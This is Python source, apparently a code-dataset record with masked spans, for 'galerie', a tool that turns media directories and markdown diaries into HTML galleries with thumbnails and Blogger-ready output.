BOOL[args.recursive]), ('dates', args.dates), ('github_pages',\n BOOL[args.github_pages])\n cfgname = configfilename(args)\n with open(cfgname) as f:\n cfglines = [_.strip() for _ in f.readlines()]\n for key, value in updates:\n for iline, line in enumerate(cfglines):\n if line.startswith(key):\n cfglines[iline] = f'{key} = {value}'\n break\n with open(cfgname, 'wt') as f:\n for line in cfglines:\n print(line, file=f)\n\n\ndef warning(*msg):\n print(colorama.Fore.YELLOW + colorama.Style.BRIGHT + ' '.join(msg),\n colorama.Style.RESET_ALL)\n\n\n<mask token>\n\n\ndef errorcode(msg):\n return ERRORS.splitlines().index(msg) + 1\n\n\ndef error(*msg):\n print(colorama.Fore.RED + colorama.Style.BRIGHT + ' '.join(msg),\n colorama.Style.RESET_ALL)\n sys.exit(errorcode(msg[0]))\n\n\n<mask token>\n\n\ndef parse_command_line(argstring):\n parser = argparse.ArgumentParser(description=None, usage=USAGE)\n agroup = parser.add_argument_group('Commands')\n xgroup = agroup.add_mutually_exclusive_group()\n xgroup.add_argument('--gallery', help='source in --sourcedir', action=\n 'store', metavar='<root-dir>')\n agroup.add_argument('--update', help=\n 'updates gallery with parameters in config file', action='store',\n metavar='<root-dir>')\n xgroup.add_argument('--create', help=\n 'create journal from medias in --sourcedir', action='store',\n metavar='<root-dir>')\n xgroup.add_argument('--resetcfg', help='reset config file to defaults',\n action='store', metavar='<root-dir>')\n xgroup.add_argument('--setcfg', help=argparse.SUPPRESS, action='store',\n nargs=4, metavar='<root-dir>')\n xgroup.add_argument('--idem', help=argparse.SUPPRESS, action='store',\n metavar='<root-dir>')\n xgroup.add_argument('--blogger', help=\n 'input md, html blogger ready in clipboard', action='store',\n metavar='<root-dir>')\n agroup = parser.add_argument_group('Parameters')\n agroup.add_argument('--bydir', help='organize gallery by subdirectory',\n action='store', default=None, choices=BOOL)\n agroup.add_argument('--bydate', help='organize gallery by date', action\n ='store', default=None, choices=BOOL)\n agroup.add_argument('--diary', help=\n 'organize gallery using markdown file diary', action='store',\n default=None, choices=BOOL)\n agroup.add_argument('--recursive', help='--sourcedir scans recursively',\n action='store', default=None, choices=BOOL)\n agroup.add_argument('--dates', help='dates interval', action='store',\n default=None)\n agroup.add_argument('--sourcedir', help='media directory', action=\n 'store', default=None)\n agroup.add_argument('--github_pages', help='github Pages compatibility',\n action='store', default=None, choices=BOOL)\n agroup.add_argument('--dest', help='output directory', action='store')\n agroup.add_argument('--forcethumb', help=\n 'force calculation of thumbnails', action='store_true', default=False)\n agroup.add_argument('--full', help=\n 'full html (versus blogger ready html)', action='store_true',\n default=False)\n agroup.add_argument('--check', dest='check_images', help=\n 'check availability of medias on blogger', action='store_true')\n agroup.add_argument('--url', dest='urlblogger', help='blogger post url',\n action='store')\n if argstring is None:\n print('Type \"galerie -h\" for help')\n sys.exit(1)\n else:\n args = parser.parse_args(argstring.split())\n if args.update and (args.bydir or args.bydate or args.diary or args.\n sourcedir or args.recursive or args.dates or args.github_pages):\n error('Incorrect parameters:',\n '--update cannot be used with creation parameters, use explicit command'\n )\n args.bydir = args.bydir == 'true'\n args.bydate = args.bydate == 'true'\n args.diary = args.diary == 'true'\n args.recursive = args.recursive == 'true'\n args.dates = 'source' if args.dates is None else args.dates\n args.github_pages = args.github_pages == 'true'\n args.root = (args.create or args.gallery or args.update or args.blogger or\n args.idem or args.resetcfg)\n if args.setcfg:\n args.root = args.setcfg[0]\n args.setcfg = args.setcfg[1:]\n return args\n\n\ndef setup_part1(args):\n \"\"\"\n Made before reading config file (config file located in args.root).\n Check and normalize root path.\n \"\"\"\n args.rootarg = args.root\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext == '':\n pass\n else:\n args.root = os.path.dirname(args.root)\n if args.root:\n args.root = os.path.abspath(args.root)\n if not os.path.isdir(args.root):\n if args.gallery:\n os.mkdir(args.root)\n else:\n error('Directory not found', args.root)\n\n\ndef setup_part2(args):\n \"\"\"\n Made after reading config file.\n Check for ffmpeg in path.\n Create .thumbnails dir if necessary and create .nomedia in it.\n Copy photobox file to destination dir.\n Handle priority between command line and config file.\n \"\"\"\n if args.update:\n args.sourcedir = args.source.sourcedir\n args.bydir = args.source.bydir\n args.bydate = args.source.bydate\n args.diary = args.source.diary\n args.recursive = args.source.recursive\n args.dates = args.source.dates\n args.github_pages = args.source.github_pages\n elif args.gallery:\n args.source.sourcedir = args.sourcedir\n args.source.bydir = args.bydir\n args.source.bydate = args.bydate\n args.source.diary = args.diary\n args.source.recursive = args.recursive\n args.source.dates = args.dates\n args.source.github_pages = args.github_pages\n update_config(args)\n if args.github_pages:\n args.html_suffix = '.html'\n else:\n args.html_suffix = '.htm'\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext:\n args.rootname = os.path.basename(args.rootarg)\n else:\n args.rootname = 'index' + args.html_suffix\n if args.sourcedir:\n args.sourcedir = os.path.abspath(args.sourcedir)\n if os.path.splitdrive(args.sourcedir)[0]:\n drive, rest = os.path.splitdrive(args.sourcedir)\n args.sourcedir = drive.upper() + rest\n if not os.path.isdir(args.sourcedir):\n error('Directory not found', args.sourcedir)\n elif args.gallery and args.diary is False and args.update is None:\n error('Directory not found', 'Use --sourcedir')\n if args.dest:\n args.dest = os.path.abspath(args.dest)\n if args.dest is None:\n args.dest = args.root\n if args.blogger and args.urlblogger is None:\n error('No blogger url (--url)')\n if args.gallery or args.update:\n for exe in ('ffmpeg', 'ffprobe'):\n try:\n check_output([exe, '-version'])\n except FileNotFoundError:\n error('File not found', exe)\n if args.github_pages:\n args.thumbrep = 'thumbnails'\n else:\n args.thumbrep = '.thumbnails'\n args.thumbdir = os.path.join(args.dest, args.thumbrep)\n if not os.path.exists(args.thumbdir):\n os.mkdir(args.thumbdir)\n open(os.path.join(args.thumbdir, '.nomedia'), 'a').close()\n favicondst = os.path.join(args.dest, 'favicon.ico')\n if not os.path.isfile(favicondst):\n faviconsrc = os.path.join(os.path.dirname(__file__), 'favicon.ico')\n shutil.copyfile(faviconsrc, favicondst)\n photoboxdir = os.path.join(args.dest, 'photobox')\n if not os.path.exists(photoboxdir):\n photoboxsrc = os.path.join(os.path.dirname(__file__), 'photobox')\n shutil.copytree(photoboxsrc, photoboxdir)\n if args.dates:\n if not (args.gallery or args.create):\n pass\n if args.dates == 'source':\n pass\n elif args.dates == 'diary':\n if args.create:\n error('Incorrect date format', args.dates)\n elif re.match('\\\\d+-\\\\d+', args.dates):\n date1, date2 = args.dates.split('-')\n if validate_date(date1) and validate_date(date2):\n args.dates = date1, date2\n else:\n error('Incorrect date format', args.dates)\n else:\n error('Incorrect date format', args.dates)\n\n\ndef main(argstring=None):\n colorama.init()\n args = parse_command_line(argstring)\n setup_part1(args)\n read_config(args)\n setup_part2(args)\n try:\n if args.gallery or args.update:\n create_gallery(args)\n elif args.create:\n create_diary(args)\n elif args.blogger:\n prepare_for_blogger(args)\n elif args.idem:\n idempotence(args)\n elif args.setcfg:\n setconfig_cmd(args)\n except KeyboardInterrupt:\n warning('Interrupted by user.')\n\n\n<mask token>\n",
"step-5": "\"\"\"\nMake html galleries from media directories. Organize by dates, by subdirs or by\nthe content of a diary file. The diary file is a markdown file organized by\ndates, each day described by a text and some medias (photos and movies).\n\nThe diary file can be exported to:\n* an html file with the text and subset of medias associated with each day,\n* the previous html file extended with all medias in the media directory,\n* an html file ready to import into Blogger.\n\"\"\"\n\n\nimport sys\nimport os\nimport argparse\nimport glob\nimport shutil\nimport re\nimport io\nimport bisect\nimport locale\nimport textwrap\nimport base64\nimport datetime\nimport urllib\n\nfrom configparser import ConfigParser\nfrom collections import defaultdict\nfrom subprocess import check_output, CalledProcessError, STDOUT\nfrom urllib.request import urlopen\n\nimport colorama\nimport clipboard\nimport PIL\nfrom PIL import Image, ImageChops\nfrom lxml import objectify\nimport markdown\n\n\nUSAGE = \"\"\"\ngalerie --gallery <root-dir> [--sourcedir <media-dir>]\n [--bydir true|false*]\n [--bydate true|false*]\n [--diary true|false*]\n [--recursive true|false*]\n [--dates source*|diary|<yyyymmdd-yyyymmdd>]\n [--github_pages true|false]\n [--dest <directory>]\n [--forcethumb]\ngalerie --update <root-dir>\ngalerie --create <root-dir> --sourcedir <media-dir>\n [--recursive true|false*]\n [--dates source*|<yyyymmdd-yyyymmdd>]\ngalerie --blogger <root-dir> --url <url>\n [--check]\n [--full]\n [--dest <filename>]\n\nNotes:\n - * gives default\n - all options can be abbreviated if there is no conflict with other options (--gallery --> --gal)\n\n\"\"\"\n\n\n# -- Post objects -------------------------------------------------------------\n\n\nCAPTION_IMAGE_STYLE = '''\\\n<style type=\"text/css\">\n span { display:inline-table; }\n </style>\\\n'''\n\nSTYLE = '''\\\n<style type=\"text/css\">\n p { margin-top:0px; margin-bottom:0px; }\n h3 { font-size: 100%%; font-weight: bold; margin-top:0px; margin-bottom:0px; }\n </style>\n'''\n\nSTART = f'''\\\n<html>\n\n<head>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\n <title>%s</title>\n <link rel=\"icon\" href=\"favicon.ico\" />\n <meta name=\"viewport\" content=\"width=device-width\">\n <link rel=\"stylesheet\" href=\"photobox/photobox.css\">\n <script src=\"photobox/jquery.min.js\"></script>\n <script src=\"photobox/jquery.photobox.js\"></script>\n{CAPTION_IMAGE_STYLE}\n{STYLE}\n</head>\n\n<body>\\\n'''\n\nBUTTONS = '''\\\n<button id=\"btn_full\" type=\"button\" style=\"position: fixed; width: 50px; top: 20px; right: 20px; background-color:white\">Full</button>\n<button id=\"btn_blog\" type=\"button\" style=\"position: fixed; width: 50px; top: 40px; right: 20px; background-color:white\">Diary</button>\n<button id=\"btn_text\" type=\"button\" style=\"position: fixed; width: 50px; top: 60px; right: 20px; background-color:white\">Text</button>\n\n<script>\n$('#btn_full').click(function() {\n $(\"[id^=gallery-blog]\").show();\n $(\"[id^=gallery-dcim]\").show();\n $(\"div.extra\").show();\n});\n$('#btn_text').click(function() {\n $(\"[id^=gallery-blog]\").hide();\n $(\"[id^=gallery-dcim]\").hide();\n $(\"div.extra\").hide();\n});\n$('#btn_blog').click(function() {\n $(\"[id^=gallery-blog]\").show();\n $(\"[id^=gallery-dcim]\").hide();\n $(\"div.extra\").hide();\n});\n</script>\n'''\n\nSUBDIR_BACKCOL = '#eee'\nEND = '</body>\\n</html>'\nSEP = '<hr color=\"#C0C0C0\" size=\"1\" />'\nIMGPOST = '<a href=\"%s\"><img src=\"%s\" width=\"%d\" height=\"%d\" title=\"%s\"/></a>'\nVIDPOST = '<a href=\"%s\" rel=\"video\"><img src=\"%s\" width=\"%d\" height=\"%d\" title=\"%s\"/></a>'\nIMGPOSTCAPTION = '''\\\n<span>\n<a href=\"%s\"><img src=%s width=\"%d\" height=\"%d\" title=\"%s\"/></a>\n<p>%s</p>\n</span>\n'''\nVIDPOSTCAPTION = '''\\\n<span>\n<a href=\"%s\" rel=\"video\"><img src=%s width=\"%d\" height=\"%d\" title=\"%s\"/></a>\n<p>%s</p>\n</span>\n'''\nIMGDCIM = '<a href=\"%s\"><img src=\"%s\" width=\"%d\" height=\"%d\" title=\"%s\"/></a>'\nVIDDCIM = '<a href=\"%s\" rel=\"video\"><img src=\"%s\" width=\"%d\" height=\"%d\" title=\"%s\"/></a>'\n\n# diminution de l'espace entre images, on utilise :\n# \"display: block;\", \"margin-bottom: 0em;\" et \"font-size: 0;\"\n# \"display: block;\" dans img : espacement correct ordi mais pas centré téléphone\n# \"display: block;\" dans a : ok\n\nDIRPOST = '<a href=\"%s\"><img src=\"%s\" width=\"%d\" height=\"%d\" style=\"border: 1px solid #C0C0C0;\" /></a>'\nDIRPOSTCAPTION = f'''\n<span style=\"background-color:{SUBDIR_BACKCOL}; margin-bottom: 8px; border: 1px solid #C0C0C0;\">\n<a href=\"%s\"><img src=\"%s\" width=\"%d\" height=\"%d\" style=\"border: 1px solid #C0C0C0;\" /></a>\n<p style=\"margin-left:2px;\">%s</p>\n</span>\n'''\nBIMGPAT = '''\\\n<div class=\"separator\" style=\"clear: both; text-align: center;\">\n<a href=\"%s\" style=\"clear: left; margin-bottom: 0em; margin-right: 1em; font-size: 0; display: block;\">\n<img border=\"0\" src=\"%s\" width=\"640\" />\n</a></div>\n'''\nCAPTION_PAT = '''\\\n<div class=\"separator\" style=\"clear: both; text-align: center;\">\n%s\n</div>\n'''\n\n\nclass Post:\n def __init__(self, date, text, medias):\n # date: yyyymmdd\n self.date = date\n self.text = text\n self.medias = medias\n self.dcim = []\n self.daterank = 0\n self.extra = False\n\n def __lt__(self, other):\n return self.date < other.date\n\n @classmethod\n def from_markdown(cls, post):\n m = re.match(r'\\[(\\d\\d\\d\\d/\\d\\d/\\d\\d)\\]\\n*', post[0])\n if m:\n date = m.group(1).replace('/', '')\n if not validate_date(date):\n error('Incorrect date value:', date)\n del post[0]\n else:\n error('No date in post', ' '.join(post))\n\n while post and not post[0].strip():\n del post[0]\n\n text = ''\n while post and not re.match(r'!?\\[\\]', post[0]):\n text += post[0]\n del post[0]\n\n # remove empty lines at end\n text = re.sub(r'\\n\\n$', '\\n', text)\n\n medias = list()\n while post and (match := re.match(r'!?\\[\\]\\((.*)\\)', post[0])):\n media = match.group(1)\n caption = None\n del post[0]\n if post and not re.match(r'!?\\[\\]', post[0]):\n caption = post[0].strip()\n del post[0]\n if match.group(0)[0] == '!':\n medias.append(PostImage(caption, media))\n else:\n medias.append(PostVideo(caption, media))\n\n return cls(date, text, medias)\n\n @classmethod\n def from_date(cls, date):\n dt = datetime.datetime.strptime(date, '%Y%m%d')\n datetext = dt.strftime(\"%A %d %B %Y\").capitalize()\n post = cls(date, text=datetext, medias=[])\n post.daterank = 1\n return post\n\n def to_html(self, args, target='regular'):\n if target == 'regular':\n if args.diary:\n return self.to_html_diary(args)\n else:\n return self.to_html_regular(args)\n if target == 'blogger':\n return self.to_html_blogger()\n\n def to_html_regular(self, args):\n html = list()\n if self.text:\n # possible with --bydate\n html.append(markdown.markdown(self.text))\n subdirs, dcim = dispatch_post_items(self.dcim)\n if self.dcim:\n html.append(SEP)\n for media in subdirs:\n html.append(media.to_html_dcim(args))\n if dcim:\n html.append(f'<div id=\"gallery-dcim-{self.date}-{self.daterank}\">')\n for media in dcim:\n html.append(media.to_html_dcim(args))\n html.append('</div>')\n\n html.append(SEP)\n return html\n\n def to_html_diary(self, args):\n html = list()\n if self.extra:\n html.append('<div class=\"extra\">')\n\n if self.text:\n html.append(markdown.markdown(self.text))\n\n if self.medias:\n html.append(f'<div id=\"gallery-blog-{self.date}-{self.daterank}\">')\n for media in self.medias:\n html.append(media.to_html_post(args))\n html.append('</div>')\n\n _, dcim = dispatch_post_items(self.dcim)\n if dcim:\n html.append(f'<div id=\"gallery-dcim-{self.date}-{self.daterank}\">')\n html.append(SEP)\n for media in dcim:\n html.append(media.to_html_dcim(args))\n html.append('</div>')\n\n html.append(SEP)\n if self.extra:\n html.append('</div>')\n return html\n\n def to_html_blogger(self):\n html = list()\n html.append(markdown.markdown(self.text))\n for image in self.medias:\n html.append(image.to_html_blogger())\n html.append(SEP)\n return html\n\n\nclass PostItem:\n def __init__(self, caption, uri, thumb=None, thumbsize=None, descr=''):\n self.caption = caption\n self.uri = uri\n self.basename = os.path.basename(uri)\n self.thumb = thumb\n self.thumbsize = thumbsize\n self.descr = descr\n self.resized_url = None\n\n\nclass PostImage(PostItem):\n def to_markdown(self):\n if not self.caption:\n return '' % (self.uri,)\n else:\n return '\\n%s' % (self.uri, self.caption)\n\n def to_html_post(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n if not self.caption:\n return IMGPOST % (self.uri, self.thumb, *self.thumbsize, descr)\n else:\n return IMGPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize, descr, self.caption)\n\n def to_html_dcim(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n return IMGDCIM % (relative_url(self.uri, args.root), self.thumb, *self.thumbsize, descr)\n\n def to_html_blogger(self):\n if not self.caption:\n return BIMGPAT % (self.uri, self.resized_url)\n else:\n return f'{BIMGPAT}\\n{CAPTION_PAT}' % (self.uri, self.resized_url, self.caption)\n\n\nclass PostVideo(PostItem):\n def to_markdown(self):\n if not self.caption:\n return '[](%s)' % (self.uri,)\n else:\n return '[](%s)\\n%s' % (self.uri, self.caption)\n\n def to_html_post(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n if not self.caption:\n return VIDPOST % (self.uri, self.thumb, *self.thumbsize, descr)\n else:\n return VIDPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize, descr, self.caption)\n\n def to_html_dcim(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n return VIDDCIM % (relative_url(self.uri, args.root), self.thumb, *self.thumbsize, descr)\n\n def to_html_blogger(self):\n x = f'<p style=\"text-align: center;\">{self.iframe}</p>'\n if not self.caption:\n return x\n else:\n return f'%s\\n{CAPTION_PAT}' % (x, self.caption)\n\n\nclass PostSubdir(PostItem):\n def to_html_dcim(self, args):\n basename = os.path.basename(self.htmname)\n posts = self.posts\n title = self.caption\n print_html(args, posts, title, self.htmname)\n\n if not self.caption:\n return DIRPOST % (basename, self.thumb, *self.thumbsize)\n else:\n return DIRPOSTCAPTION % (basename, self.thumb, *self.thumbsize, self.caption)\n\n\ndef relative_url(path, root):\n \"\"\"\n returns a normalized url to path relative from root\n \"\"\"\n try:\n url = os.path.relpath(path, root)\n except:\n error('Unable to make a relative url:', url, root)\n\n url = url.replace('\\\\', '/') if os.sep == '\\\\' else url\n\n return urllib.parse.quote(url)\n\n\n# -- Markdown parser ----------------------------------------------------------\n\n\ndef parse_markdown(filename):\n \"\"\"\n Generate Post objects from markdown. Date must be present in each post and\n posts must be ordrered by date.\n \"\"\"\n if not os.path.exists(filename):\n error('File not found', filename)\n\n posts = list()\n with open(filename, encoding='utf-8') as f:\n line = next(f)\n if line.startswith('# '):\n title = line[2:].strip()\n record = []\n next(f)\n else:\n title = None\n record = [line]\n for line in f:\n if not line.startswith('___'):\n record.append(line)\n else:\n posts.append(Post.from_markdown(record))\n record = []\n\n # set rank of posts in date\n daterank = defaultdict(int)\n for post in posts:\n daterank[post.date] += 1\n post.daterank = daterank[post.date]\n\n # check post order\n for post1, post2 in zip(posts[:-1], posts[1:]):\n if post1.date > post2.date:\n error('Posts are not ordered', f'{post1.date} > {post2.date}')\n\n return title, posts\n\n\n# -- Markdown printer ---------------------------------------------------------\n\n\ndef print_markdown(posts, title, fullname):\n with open(fullname, 'wt', encoding='utf-8') as fdst:\n print(f'# {title}\\n', file=fdst)\n for post in posts:\n date = f'[{post.date[0:4]}/{post.date[4:6]}/{post.date[6:8]}]'\n print(date, file=fdst)\n if post.text:\n print(file=fdst)\n for line in post.text.splitlines():\n if not line:\n print(file=fdst)\n else:\n for chunk in textwrap.wrap(line, width=78):\n print(chunk, file=fdst)\n if post.medias:\n print(file=fdst)\n for media in post.medias:\n print(media.to_markdown(), file=fdst)\n print('______', file=fdst)\n\n\n# -- html printer -------------------------------------------------------------\n\n\ndef compose_html_reduced(args, posts, title, target):\n html = list()\n html.append(START % title)\n\n for post in posts:\n for line in post.to_html(args, target):\n html.append(line.strip())\n html.append('')\n\n html.append(END)\n return html\n\n\ndef compose_html_full(args, posts, title, target):\n html = list()\n html.append(START % title)\n\n if args.diary:\n html.append(BUTTONS)\n\n for post in posts:\n for line in post.to_html(args, target):\n html.append(line.strip())\n html.append('')\n\n html.append('<script>')\n for post in posts:\n if post.medias:\n gallery_id = f'gallery-blog-{post.date}-{post.daterank}'\n html.append(gallery_call(args, gallery_id))\n if post.dcim:\n gallery_id = f'gallery-dcim-{post.date}-{post.daterank}'\n html.append(gallery_call(args, gallery_id))\n html.append('</script>')\n\n html.append(END)\n return html\n\n\ndef print_html_to_stream(args, posts, title, stream, target):\n if target == 'regular':\n for line in compose_html_full(args, posts, title, target):\n print(line, file=stream)\n else:\n for line in compose_html_reduced(args, posts, title, target):\n print(line, file=stream)\n\n\ndef print_html(args, posts, title, html_name, target='regular'):\n assert target in ('regular', 'blogger')\n with io.StringIO() as f:\n print_html_to_stream(args, posts, title, f, target)\n html = f.getvalue()\n\n if html_name:\n if os.path.exists(html_name):\n # test if the generated html is identical to the one already on disk\n with open(html_name, 'rt', encoding='utf-8') as f:\n html0 = f.read()\n if html == html0:\n return None\n with open(html_name, 'wt', encoding='utf-8') as f:\n f.write(html)\n return None\n else:\n return html\n\n\nGALLERYCALL = \"\"\"\n$('#%s').photobox('a', {\nloop:%s,\nthumbs:%s,\nautoplay:%s,\ntime:%d,\nzoomable:%s ,\nrotatable:%s,\nwheelNextPrev:%s\n});\n\"\"\"\n\n\ndef gallery_call(args, gallery_id):\n return GALLERYCALL.replace('\\n', '') % (\n gallery_id,\n str(args.photobox.loop).lower(),\n str(args.photobox.thumbs).lower(),\n str(args.photobox.autoplay).lower(),\n args.photobox.time,\n str(args.photobox.zoomable).lower(),\n str(args.photobox.rotatable).lower(),\n str(args.photobox.wheelNextPrev).lower(),\n )\n\n\n# -- Media description --------------------------------------------------------\n\n\ndef is_image_file(name):\n return os.path.splitext(name)[1].lower() in (\n '.jpg', '.jpeg', '.png', '.gif', '.bmp', '.webp', '.tif'\n )\n\n\ndef is_video_file(name):\n return os.path.splitext(name)[1].lower() in (\n '.mp4', '.webm', '.mkv', '.flv', '.m4v', '.avi', '.wmv', '.mts', '.vob', '.divx'\n )\n\n\ndef is_media(name):\n return is_image_file(name) or is_video_file(name)\n\n\ndef validate_date(datestr):\n # datestr = yyyymmdd\n try:\n datetime.datetime.strptime(datestr, '%Y%m%d')\n return True\n except ValueError:\n return False\n\n\ndef date_from_name(name):\n # heuristics\n if match := re.search(r'(?:\\D|^)(\\d{8})(?:\\D|$)', name, re.ASCII):\n digits = match.group(1)\n if validate_date(digits):\n return digits\n return None\n\n\ndef date_from_item(filename):\n if date := date_from_name(filename):\n return date\n else:\n timestamp = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(timestamp).strftime('%Y%m%d')\n\n\ndef time_from_name(name):\n # heuristics\n if match := re.search(r'(?:\\D|^)(\\d{8})\\D(\\d{6})(?:\\D|$)', name, re.ASCII):\n digits = match.group(2)\n hour, minute, second = int(digits[0:2]), int(digits[2:4]), int(digits[4:6])\n if 0 <= hour < 24 and 0 <= minute < 60 and 0 <= second < 60:\n return digits\n return None\n\n\ndef time_from_item(filename):\n if time := time_from_name(filename):\n return time\n else:\n timestamp = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(timestamp).strftime('%H%M%S')\n\n\nFFPROBE_CMD = '''\\\n ffprobe -v error\n -select_streams v:0\n -show_entries stream=width,height,avg_frame_rate,r_frame_rate:format=duration\n -of csv=p=0\n'''\n\n\ndef get_image_info(filename):\n date = date_from_item(filename)\n time = time_from_item(filename)\n img = Image.open(filename)\n width, height = img.size\n size = round(os.path.getsize(filename) / 1e6, 1)\n return (date, time, width, height, size), f'{date} {time}, dim={width}x{height}, {size} MB'\n\n\ndef get_video_info(filename, info_fullname):\n if os.path.exists(info_fullname):\n with open(info_fullname) as f:\n info = f.readline().split()\n date, time, width, height, size, duration, fps = info[0], info[1], int(info[2]), int(info[3]), float(info[4]), int(info[5]), float(info[6])\n formatted_info = format_video_info(date, time, width, height, size, duration, fps)\n return (date, time, width, height, size, duration, fps), formatted_info\n else:\n info, formatted_info = make_video_info(filename, info_fullname)\n with open(info_fullname, 'wt') as f:\n print(' '.join([str(_) for _ in info]), file=f)\n return info, formatted_info\n\n\ndef make_video_info(filename, info_fullname):\n # ffmpeg must be in path\n date = date_from_item(filename)\n time = time_from_item(filename)\n command = [*FFPROBE_CMD.split(), filename]\n try:\n output = check_output(command, stderr=STDOUT).decode()\n width, height, fps, duration = parse_ffprobe_output(output)\n size = round(os.path.getsize(filename) / 1e6, 1)\n output = format_video_info(date, time, width, height, size, duration, fps)\n except CalledProcessError as e:\n output = e.output.decode()\n warning(output)\n raise\n return (date, time, width, height, size, duration, fps), output\n\n\ndef parse_ffprobe_output(ffprobe_output):\n # parse first channel data and last line for duration\n match = re.match(r'(\\d+),(\\d+),(\\d+)/(\\d+),(\\d+/\\d+).*\\s(\\d+\\.\\d+)', ffprobe_output, re.DOTALL)\n width = int(match.group(1))\n height = int(match.group(2))\n fps = round(int(match.group(3)) / int(match.group(4)), 1)\n duration = round(float(match.group(6)))\n return width, height, fps, duration\n\n\ndef format_video_info(date, time, width, height, size, duration, fps):\n return f'{date} {time}, dim={width}x{height}, {format_duration(duration)}, fps={fps}, {size} MB'\n\n\ndef format_duration(duration):\n mn = duration // 60\n sec = duration % 60\n if mn <= 59:\n return f'm:s={mn:02}:{sec:02}'\n else:\n hour = mn // 60\n mn = mn % 60\n return f'h:m:s={hour:02}:{mn:02}:{sec:02}'\n\n\n# -- Thumbnails (image and video) ---------------------------------------------\n\n\ndef thumbname(name, key):\n return key + '-' + name + '.jpg'\n\n\ndef size_thumbnail(width, height, maxdim):\n if width >= height:\n return maxdim, int(round(maxdim * height / width))\n else:\n return int(round(maxdim * width / height)), maxdim\n\n\ndef make_thumbnail_image(args, image_name, thumb_name, size):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_image(image_name, thumb_name, size)\n\n\ndef create_thumbnail_image(image_name, thumb_name, size):\n imgobj = Image.open(image_name)\n\n if (imgobj.mode != 'RGBA'\n and image_name.endswith('.jpg')\n and not (image_name.endswith('.gif') and imgobj.info.get('transparency'))\n ):\n imgobj = imgobj.convert('RGBA')\n\n imgobj.thumbnail(size, Image.LANCZOS)\n imgobj = imgobj.convert('RGB')\n imgobj.save(thumb_name)\n\n\ndef make_thumbnail_video(args, video_name, thumb_name, size, duration):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_video(args, video_name, thumb_name, size, duration)\n\n\n# base64 video.png\nVIDEO_ICON = '''\\\niVBORw0KGgoAAAANSUhEUgAAABgAAAAUCAAAAACy3qJfAAAA4UlEQVR4\n2m1QoRbCMAy88SaK69xscfuEWiS4SZBIcCCRfAL8An8AcnJzTOJSWdxwzJXSPUoHRPQlueYuucigxm\n9kDGaMf8AjopGcYn8LmmyLoihBWBiThb+5MTuUsc3aL56upneZ9sByAIg8Z8BEn96EeZ65iU7DvmbP\nPxqDcH6p1swXBC4l6yZskACkTN1WrQr2SlIFhTtgqeZa+zsOogLXegvEocZ5c/W5BcoVNNCg3hSudV\n/hEh4ofw6cEb00Km8i0dpRDUXfKiaQOEAdrUDo4dFp9C33jjaRac9/gDF/AlplVYtfWGCjAAAAAElF\nTkSuQmCC'''\n\n\ndef create_thumbnail_video(args, filename, thumbname, size, duration):\n # ffmpeg must be in path\n delay = min(duration - 1, args.thumbnails.thumbdelay)\n sizearg = '%dx%d' % size\n command = 'ffmpeg -y -v error -itsoffset -%d -i \"%s\" -vcodec mjpeg -vframes 1 -an -f rawvideo -s %s \"%s\"'\n command = command % (delay, filename, sizearg, thumbname)\n result = os.system(command)\n\n # add a movie icon to the thumbnail to identify videos\n try:\n img1 = Image.open(thumbname)\n except:\n # ffmpeg was unable to save thumbnail\n warning('Unable to save thumbnail for', filename)\n return\n img2 = Image.open(io.BytesIO(base64.b64decode(VIDEO_ICON)))\n width, height = img1.size\n img1.paste(img2, (6, height - 20 - 6), None)\n img1.save(thumbname)\n\n\ndef make_thumbnail_subdir(args, subdir_name, thumb_name, size, items, thumbdir):\n # subdir thumbnails are always created as they depend on the content of the\n # directory\n print('Making thumbnail:', thumb_name)\n create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir)\n\n\ndef create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir):\n\n def size_thumbnail(width, height, xmax, ymax):\n width2 = xmax\n height2 = int(round(xmax * height / width))\n if height2 < ymax:\n width2 = int(round(ymax * width / height))\n height2 = ymax\n return width2, height2\n\n thumblist = [os.path.basename(item.thumb) for item in items]\n widthnum, heightnum, width, height, offsetx, offsety = mosaic_geometry(size, thumblist)\n thumbnum = widthnum * heightnum\n img = Image.new('RGB', size, SUBDIR_BACKCOL)\n\n for ind, thumb in enumerate(thumblist[:min(thumbnum, len(thumblist))]):\n row = ind // widthnum\n col = ind % widthnum\n img2 = Image.open(os.path.join(thumbdir, thumb))\n w, h = size_thumbnail(*img2.size, width[col], height[row])\n cropdim = ((w - width[col]) // 2, (h - height[row]) // 2,\n (w - width[col]) // 2 + width[col], (h - height[row]) // 2 + height[row])\n img2 = img2.resize((w, h), Image.LANCZOS)\n img2 = img2.crop(cropdim)\n img.paste(img2, (offsetx[col], offsety[row]))\n\n if os.path.exists(thumb_name):\n # test if the generated thumbnail is identical to the one already on disk\n imgref = Image.open(thumb_name)\n\n # must save and reload before comparing\n byteio = io.BytesIO()\n img.save(byteio, \"JPEG\")\n byteio.seek(0)\n imgnew = Image.open(byteio)\n\n diff = ImageChops.difference(imgnew, imgref)\n if diff.getbbox() is None:\n return\n\n img.save(thumb_name)\n\n\ndef mosaic_geometry(size, thumblist):\n if len(thumblist) == 1:\n widthnum = 1\n heightnum = 1\n elif len(thumblist) <= 3:\n widthnum = 1\n heightnum = 2\n elif len(thumblist) <= 8:\n widthnum = 2\n heightnum = 2\n else:\n widthnum = 3\n heightnum = 3\n\n if widthnum == 1:\n width = [size[0] - 2]\n else:\n width = [size[0] // widthnum - 2] * (widthnum - 1)\n width.append(size[0] - (1 + sum(width) + 2 * len(width) + 1))\n\n if heightnum == 1:\n height = [size[1] - 2]\n else:\n height = [size[1] // heightnum - 2] * (heightnum - 1)\n height.append(size[1] - (1 + sum(height) + 2 * len(height) + 1))\n\n offsetx = [1]\n for w in width[:-1]:\n offsetx.append(offsetx[-1] + w + 2)\n\n 